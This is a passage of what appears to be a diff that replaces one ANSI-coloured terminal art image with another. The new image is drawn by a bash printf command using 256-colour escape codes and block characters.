\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;236m▒\e[0m - \e[38;5;119;48;5;70m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;22;48;5;232m \e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;22;48;5;232m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m▒\e[38;5;114;48;5;235m▒\e[0m - \e[38;5;119;48;5;70m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;28m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;232m \e[0m - \e[38;5;119;48;5;2m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;77m░\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;34m░\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;234m▒\e[0m - \e[38;5;119;48;5;237m▒\e[38;5;22;48;5;232m \e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;77m░\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;113;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;119;48;5;113m▒\e[38;5;113;48;5;113m▒\e[38;5;119;48;5;77m▒\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;28m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;239m▒\e[38;5;22;48;5;232m░\e[38;5;119;48;5;235m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;2m \e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;119;48;5;2m░\e[38;5;119;48;5;64m▒\e[38;5;22;48;5;16m \e[38;5;119;48;5;236m▒\e[38;5;119;48;5;235m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;239m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;34m░\e[38;5;119;48;5;22m░\e[38;5;119;48;5;22m░\e[38;5;22;48;5;232m \e[38;5;119;48;5;236m▒\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;235m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;235m▒\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;2m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;22m▒\e[38;5;119;48;5;233m░\e[38;5;119;48;5;235m▒\e[38;5;119;48;5;235m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;65m▒\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;34m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;28m░\e[38;5;22;48;5;232m \e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;234m▒\e[38;5;119;48;5;234m▒\e[38;5;119;48;5;234m░\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;22;48;5;16m \e[38;5;16;48;5;16m▓\e[38;5;22;48;5;233m \e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;70m░\e[38;5;22;48;5;22m \e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m - \e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;233m░\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;233m░\e[38;5;119;48;5;64m▒\e[38;5;119;48;5;70m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;82m░\e[38;5;119;48;5;76m░\e[38;5;119;48;5;70m▒\e[38;5;119;48;5;234m▒\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;16;48;5;16m▓\e[38;5;119;48;5;237m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[38;5;119;48;5;71m▒\e[0m - '"; - + bash -c "printf ' \e[38;5;238m▄\e[38;5;233m▄\e[38;5;235m▄\e[38;5;65m▄\e[48;5;239m\e[38;5;107m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;240m\e[38;5;65m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[38;5;233m▄\e[38;5;232m▄\e[38;5;239m▄\e[0m + \e[38;5;233m▄\e[38;5;246m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;65m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;235m\e[38;5;71m▄\e[0m\e[38;5;237m▄\e[38;5;234m▄\e[0m + \e[38;5;245m▄\e[38;5;233m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;239m\e[38;5;71m▄\e[48;5;71m \e[38;5;235m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;236m\e[38;5;64m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;2m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;234m\e[38;5;22m▄\e[48;5;65m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;238m▄\e[0m + \e[38;5;239m▄\e[38;5;233m▄\e[48;5;235m\e[38;5;71m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;71m \e[38;5;0m▄\e[48;5;236m\e[38;5;2m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;22m\e[38;5;76m▄\e[48;5;0m\e[38;5;76m▄\e[48;5;234m\e[38;5;64m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m \e[48;5;234m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[0m\e[38;5;234m▄\e[38;5;233m▄\e[0m + \e[38;5;233m▄\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;71m \e[38;5;235m▄\e[48;5;65m\e[38;5;235m▄\e[48;5;0m\e[38;5;255m▄\e[48;5;22m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;242m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;254m\e[38;5;15m▄\e[48;5;15m \e[38;5;255m▄\e[48;5;255m\e[38;5;234m▄\e[48;5;248m\e[38;5;251m▄\e[48;5;240m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;64m\e[38;5;15m▄\e[48;5;70m\e[38;5;251m▄\e[48;5;76m\e[38;5;8m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;2m▄\e[48;5;64m\e[38;5;70m▄\e[48;5;232m\e[38;5;76m▄\e[48;5;238m\e[38;5;2m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[0m + \e[38;5;233m▄\e[48;5;238m\e[38;5;71m▄\e[48;5;236m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;255m▄\e[48;5;15m \e[38;5;233m▄\e[48;5;253m\e[38;5;0m▄\e[48;5;255m\e[38;5;232m▄\e[48;5;242m\e[38;5;238m▄\e[48;5;242m\e[38;5;233m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;145m\e[38;5;15m▄\e[48;5;237m\e[38;5;15m▄\e[48;5;22m\e[38;5;255m▄\e[48;5;70m\e[38;5;248m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;234m\e[38;5;233m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m \e[0m + \e[48;5;71m \e[38;5;234m▄\e[48;5;233m\e[38;5;251m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m \e[48;5;243m\e[38;5;235m▄\e[48;5;0m \e[38;5;243m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;249m\e[38;5;15m▄\e[48;5;235m\e[38;5;15m▄\e[48;5;232m\e[38;5;15m▄\e[48;5;235m\e[38;5;145m▄\e[48;5;71m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;237m▄\e[0m + \e[48;5;71m \e[48;5;65m\e[38;5;232m▄\e[48;5;241m\e[38;5;15m▄\e[48;5;15m \e[48;5;236m\e[38;5;245m▄\e[48;5;0m \e[48;5;247m\e[38;5;232m▄\e[48;5;15m \e[48;5;247m\e[38;5;15m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[48;5;237m\e[38;5;236m▄\e[0m + \e[48;5;71m \e[38;5;238m▄\e[48;5;234m\e[38;5;243m▄\e[48;5;253m\e[38;5;15m▄\e[48;5;15m \e[48;5;0m\e[38;5;7m▄\e[48;5;0m\e[38;5;239m▄\e[48;5;0m\e[38;5;102m▄\e[48;5;0m\e[38;5;234m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;252m▄\e[48;5;255m\e[38;5;15m▄\e[48;5;15m \e[48;5;239m\e[38;5;7m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m \e[0m + \e[48;5;71m \e[38;5;236m▄\e[48;5;234m\e[38;5;250m▄\e[48;5;15m \e[38;5;255m▄\e[48;5;15m\e[38;5;250m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;238m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;2m▄\e[48;5;255m\e[38;5;2m▄\e[48;5;255m\e[38;5;64m▄\e[48;5;254m\e[38;5;70m▄\e[48;5;188m\e[38;5;70m▄\e[48;5;253m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;255m\e[38;5;70m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;64m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;236m▄\e[48;5;15m\e[38;5;237m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;102m▄\e[48;5;15m\e[38;5;251m▄\e[48;5;15m\e[38;5;255m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;234m\e[38;5;235m▄\e[48;5;236m \e[0m + \e[48;5;71m \e[38;5;233m▄\e[48;5;232m\e[38;5;70m▄\e[48;5;238m\e[38;5;76m▄\e[48;5;65m\e[38;5;76m▄\e[48;5;236m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;240m\e[38;5;76m▄\e[48;5;145m\e[38;5;76m▄\e[48;5;15m\e[38;5;28m▄\e[48;5;15m\e[38;5;235m▄\e[48;5;15m\e[38;5;240m▄\e[48;5;15m\e[38;5;145m▄\e[48;5;15m\e[38;5;254m▄\e[48;5;15m \e[48;5;242m\e[38;5;251m▄\e[48;5;236m\e[38;5;235m▄\e[0m + \e[48;5;65m\e[38;5;232m▄\e[48;5;235m\e[38;5;64m▄\e[48;5;70m \e[48;5;76m \e[48;5;2m\e[38;5;76m▄\e[48;5;234m\e[38;5;76m▄\e[48;5;242m\e[38;5;76m▄\e[48;5;254m\e[38;5;64m▄\e[48;5;15m\e[38;5;234m▄\e[48;5;15m\e[38;5;243m▄\e[48;5;15m\e[38;5;253m▄\e[48;5;15m \e[48;5;255m\e[38;5;15m▄\e[48;5;233m \e[0m + \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m 